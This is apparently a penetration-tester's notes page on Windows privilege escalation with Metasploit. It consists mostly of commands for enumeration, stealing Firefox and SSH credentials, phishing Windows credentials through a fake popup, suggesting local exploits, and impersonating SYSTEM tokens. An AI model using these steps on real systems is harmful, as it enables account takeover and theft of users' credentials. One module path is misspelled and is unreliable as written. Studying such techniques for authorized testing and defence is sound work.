Skip to main content

privilege_escalation

When we have exploited a windows host we can try to become NT AUTHORITY/SYSTEM (or Administrator) by issuing getsystem, this meterpreter command will try different techniques to become root, anyway this will not always work, so it becomes useful to understand other enumeration techniques.

System Enumeration

We can check general information on the system with:

sysinfo

We can enumerate applications which are installed on the target machine:

use post/windows/gather/enum_applications
run

We can check which ports are open from meterpreter:

netstat

We can also enumerate services by dropping into a shell and doing:

sc queryex type= service

Notice that frameworks like empire help us in the privilege escalation and enumeration phase, since this can be quite time consuming.

Stealing Firefox Credentials

Another thing we can try is to steal firefox credentials with:

use post/multi/gather/firefox_creds
options
set session 1 # or instead of "1" put the session id
set decrypt true
run # if it does not work proceed with
set disclaimer true
run # if it does not work proceed with
set decrypt false
set disclaimer false
run

We can also try to steal private ssh keys by doing:

use post/multi/gather/ssh_creds
set session 1
run

Phishing Windows Credentials

Other privilege escalation techniques when we already have an account on a windows machine is to ask the user for credentials, we can do this by issuing:

use post/winddows/gather/phish_windows_credentials
run

Now a popup will appear to the user asking for credentials, until he inserts the right ones.

Of course other privesc techniques rely on the presence of the installation of wamp or in general of databases where we must try to dump the content, hopefully the credentials.

Local Exploit Suggester

Another technique we can use is to ask metasploit for suggestions on exploits to use for privesc, we can do this by issuing:

use post/multi/recon/local_exploit_suggester
set session 1
run

Now we will have the list of all the probable working exploits, we can try them one by one.

Incognito Module

We can steal tokens, these are similar to cookies in theory, they allow to switch windows accounts without reinserting the password. We can do this by executing the following commands within metasploit:

load incognito
help
list_tokens
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

We can verify if this was successful by issuing:

getuid